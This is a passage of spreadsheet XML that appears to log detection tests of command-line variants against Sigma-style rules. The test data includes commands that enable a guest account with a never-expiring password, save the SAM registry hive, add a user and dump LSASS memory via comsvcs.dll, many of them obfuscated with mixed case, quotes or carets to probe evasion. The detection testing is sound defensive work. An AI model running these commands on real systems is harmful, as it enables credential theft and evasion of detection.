          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C459" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D459" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E459" s="36" t="inlineStr">
        <is>
          <t>wmic useraccount where name='guest' set passwordexpires=0</t>
        </is>
      </c>
      <c r="F459" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G459" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H459" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I459" s="36" t="n"/>
      <c r="J459" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K459" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="460" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A460" s="43" t="n"/>
      <c r="B460" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C460" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D460" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E460" s="36" t="inlineStr">
        <is>
          <t>net user guest /active:yes /expires:never /passwordchg:no</t>
        </is>
      </c>
      <c r="F460" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G460" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H460" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I460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460" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K460" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="461" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A461" s="43" t="n"/>
      <c r="B461" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C461" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D461" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E461" s="36" t="inlineStr">
        <is>
          <t>net user guest /active:yes /eXpIrEs:neVEr /pAssworDchG:nO</t>
        </is>
      </c>
      <c r="F461" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G461" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H461" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I461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461" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K461" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="462" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A462" s="43" t="n"/>
      <c r="B462" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C462" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D462" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E462" s="36" t="inlineStr">
        <is>
          <t>net user guest /ActIve:yEs /expires:never /PaSSWOrDcHG:no</t>
        </is>
      </c>
      <c r="F462" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G462" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H462" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I462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462" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K462" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="463" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A463" s="43" t="n"/>
      <c r="B463" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C463" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D463" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E463" s="36" t="inlineStr">
        <is>
          <t>net user guest -"active:yes" /expires:never /passwordchg:no</t>
        </is>
      </c>
      <c r="F463" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G463" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H463" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I463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463" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K463" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="464" ht="15.75" customHeight="1" s="42">
      <c r="A464" s="43" t="n"/>
      <c r="B464" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C464" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D464" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E464" s="36" t="inlineStr">
        <is>
          <t>net user guest /"active:yes" /expires:never /"passwordchg:no"</t>
        </is>
      </c>
      <c r="F464" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G464" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H464" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I464" s="36" t="inlineStr">
        <is>
          <t>Suspicious Manipulation Of Default Accounts Via Net.EXE (5b768e71-86f2-4879-b448-81061cbae951); Suspicious Manipulation Of Default Accounts Via Net.EXE (5b768e71-86f2-4879-b448-81061cbae951)</t>
        </is>
      </c>
      <c r="J464" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K464" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="465" ht="15.75" customHeight="1" s="42">
      <c r="A465" s="43" t="n"/>
      <c r="B465" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C465" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D465" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E465" s="36" t="inlineStr">
        <is>
          <t>net user guest -"active:yes" /EXPIReS:NEVer /passwordchg:no</t>
        </is>
      </c>
      <c r="F465" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G465" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H465" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I465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65" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K465" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="466" ht="15.75" customHeight="1" s="42">
      <c r="A466" s="43" t="n"/>
      <c r="B466" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C466" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D466" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E466" s="36" t="inlineStr">
        <is>
          <t>net user guest /active:yes -"expires:never" /passwordchg:no</t>
        </is>
      </c>
      <c r="F466" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G466" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H466" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I466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66" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K466" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="467" ht="15.75" customHeight="1" s="42">
      <c r="A467" s="43" t="n"/>
      <c r="B467" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C467" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D467" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E467" s="36" t="inlineStr">
        <is>
          <t>net user guest /aCTIve:yEs /EXPIrES:NeVEr -"passwordchg:no"</t>
        </is>
      </c>
      <c r="F467" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G467" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H467" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I467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67" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K467" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="468" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A468" s="43" t="n"/>
      <c r="B468" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C468" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D468" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E468" s="36" t="inlineStr">
        <is>
          <t>net user guest /"active:yes" -"expires:never" -"passwordchg:no"</t>
        </is>
      </c>
      <c r="F468" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G468" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H468" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I468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468" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K468" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="469" ht="15.75" customHeight="1" s="42">
      <c r="A469" s="43" t="n"/>
      <c r="B469" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C469" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D469" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E469" s="36" t="inlineStr">
        <is>
          <t>net user guest /active:Yes -"expires:never" /passwordchg:no</t>
        </is>
      </c>
      <c r="F469" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G469" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H469" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I469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69" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K469" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="470" ht="15.75" customHeight="1" s="42">
      <c r="A470" s="43" t="n"/>
      <c r="B470" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C470" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D470" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E470" s="36" t="inlineStr">
        <is>
          <t>net user guest /aCtIve:yeS /expires:never /PASSworDChg:No</t>
        </is>
      </c>
      <c r="F470" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G470" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H470" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I470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70" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K470" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="471" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A471" s="43" t="n"/>
      <c r="B471" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C471" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D471" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E471" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMmAND "Get-WmiObject -Class Win32_UserAccount -Filter \" Name='guest'\" | Set-WmiInstance -"Arguments" @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F471" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G471" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H471" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I471" s="43" t="n"/>
      <c r="J471" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K471" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="472" ht="15.75" customHeight="1" s="42">
      <c r="A472" s="43" t="n"/>
      <c r="B472" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C472" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D472" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E472" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMand "Get-WmiObject -Class Win32_UserAccount -Filter \" Name='guest'\" | Set-WmiInstance -Arguments @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F472" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G472" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H472" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I472" s="43" t="n"/>
      <c r="J472" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K472" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="473" ht="15.75" customHeight="1" s="42">
      <c r="A473" s="43" t="n"/>
      <c r="B473" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C473" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D473" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E473" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMMAnd "Get-WmiObject -Class Win32_UserAccount -Filter \" Name='guest'\" | Set-WmiInstance -Arguments @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F473" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G473" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H473" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I473" s="43" t="n"/>
      <c r="J473" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K473" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="474" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A474" s="43" t="n"/>
      <c r="B474" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C474" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D474" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E474" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMMAnd "Get-WmiObject -Class Win32_UserAccount -Filter \" Name='guest'\" | Set-WmiInstance -Arguments @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F474" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G474" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H474" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I474" s="43" t="n"/>
      <c r="J474" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K474" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="475" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A475" s="43" t="n"/>
      <c r="B475" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C475" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D475" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E475" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Get-WmiObject -Class Win32_UserAccount -Filter \" Name='guest'\" | Set-WmiInstance /"Arguments" @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F475" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G475" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H475" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I475" s="43" t="n"/>
      <c r="J475" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K475" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="476" ht="15.75" customHeight="1" s="42">
      <c r="A476" s="43" t="n"/>
      <c r="B476" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C476" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D476" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E476" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C reg s^ave HKLM\SAM C:\temp\sam.save</t>
        </is>
      </c>
      <c r="F476" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G476" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H476" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I476" s="43" t="n"/>
      <c r="J476" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K476" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="477" ht="15.75" customHeight="1" s="42">
      <c r="A477" s="43" t="n"/>
      <c r="B477" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C477" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D477" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E477" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" reg s^ave HKLM\SAM C:\temp\sam.save</t>
        </is>
      </c>
      <c r="F477" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G477" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H477" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I477" s="43" t="n"/>
      <c r="J477" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K477" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="478" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A478" s="43" t="n"/>
      <c r="B478" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C478" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D478" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E478" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMANd "Get-WmiObject -Class Win32_UserAccount -Filter \" Name='guest'\" | Set-WmiInstance -"Arguments" @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F478" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G478" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H478" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I478" s="43" t="n"/>
      <c r="J478" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K478" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="479" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A479" s="43" t="n"/>
      <c r="B479" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C479" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D479" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E479" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "n^e^t u^s^e^r t^e^s^t^u^s^e^r P^a^s^s^w^o^r^d /a^d^d"</t>
        </is>
      </c>
      <c r="F479" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G479" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H479" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I479" s="43" t="n"/>
      <c r="J479" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K479" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="480" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A480" s="43" t="n"/>
      <c r="B480" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C480" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D480" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E480" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\comsvcs.dll C:\Windows\Temp\c.dll &amp;&amp; rundll32.exe C:\Windows\Temp\c.dll, MiniDump 500 lsass.bin</t>
        </is>
      </c>
      <c r="F480" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G480" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H480" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I480" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Rundll32 Activity (e593cf51-88db-4ee1-b920-37e89012a3c9); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J480" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K480" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="481" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A481" s="43" t="n"/>
      <c r="B481" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C481" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D481" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E481" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Set-LocalUser -Name 'guest' -PasswordNeverExpires $true"</t>
        </is>
      </c>
      <c r="F481" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G481" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H481" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I481" s="36" t="n"/>
      <c r="J481" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K481" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="482" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A482" s="43" t="n"/>
      <c r="B482" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C482" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D482" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E482" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Set-LocalUser -Name 'guest' -PasswordNeverExpires $true"</t>
        </is>
      </c>
      <c r="F482" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G482" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H482" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I482" s="36" t="n"/>
      <c r="J482" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K482" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="483" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A483" s="43" t="n"/>
      <c r="B483" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C483" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D483" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E483" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmMANd "Set-LocalUser -Name 'guest' -PasswordNeverExpires $true"</t>
        </is>
      </c>
      <c r="F483" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G483" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H483" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I483" s="36" t="n"/>
      <c r="J483" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K483" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="484" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A484" s="43" t="n"/>
      <c r="B484" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C484" s="43" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D484" s="43" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E484" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -commAnd "Set-LocalUser -Name 'guest' -PasswordNeverExpires $true"</t>
        </is>
      </c>
      <c r="F484" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G484" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H484" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I484" s="43" t="n"/>
      <c r="J484" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K484" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="485" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A485" s="36" t="n"/>
      <c r="B485" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C485" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D485" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E485" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAnD "Set-LocalUser -Name 'guest' -PasswordNeverExpires $true"</t>
        </is>
      </c>
      <c r="F485" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G485" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H485" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I485" s="43" t="n"/>
      <c r="J485" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K485" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="486" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A486" s="43" t="n"/>
      <c r="B486" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C486" s="43" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D486" s="43" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E486" s="43" t="inlineStr">
        <is>
          <t>net user guest /expires:never</t>
        </is>
      </c>
      <c r="F486" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G486" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H486" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I486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86" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K486" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="487" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A487" s="36" t="n"/>
      <c r="B487" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C487" s="36" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D487" s="36" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E487" s="43" t="inlineStr">
        <is>
          <t>net user guest /expiREs:never</t>
        </is>
      </c>
      <c r="F487" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G487" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H487" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I487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87" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K487" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="488" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A488" s="43" t="n"/>
      <c r="B488" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C488" s="43" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D488" s="43" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E488" s="43" t="inlineStr">
        <is>
          <t>net user guest -"expires:never"</t>
        </is>
      </c>
      <c r="F488" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G488" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H488" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I488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488" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K488" s="43" t="b">
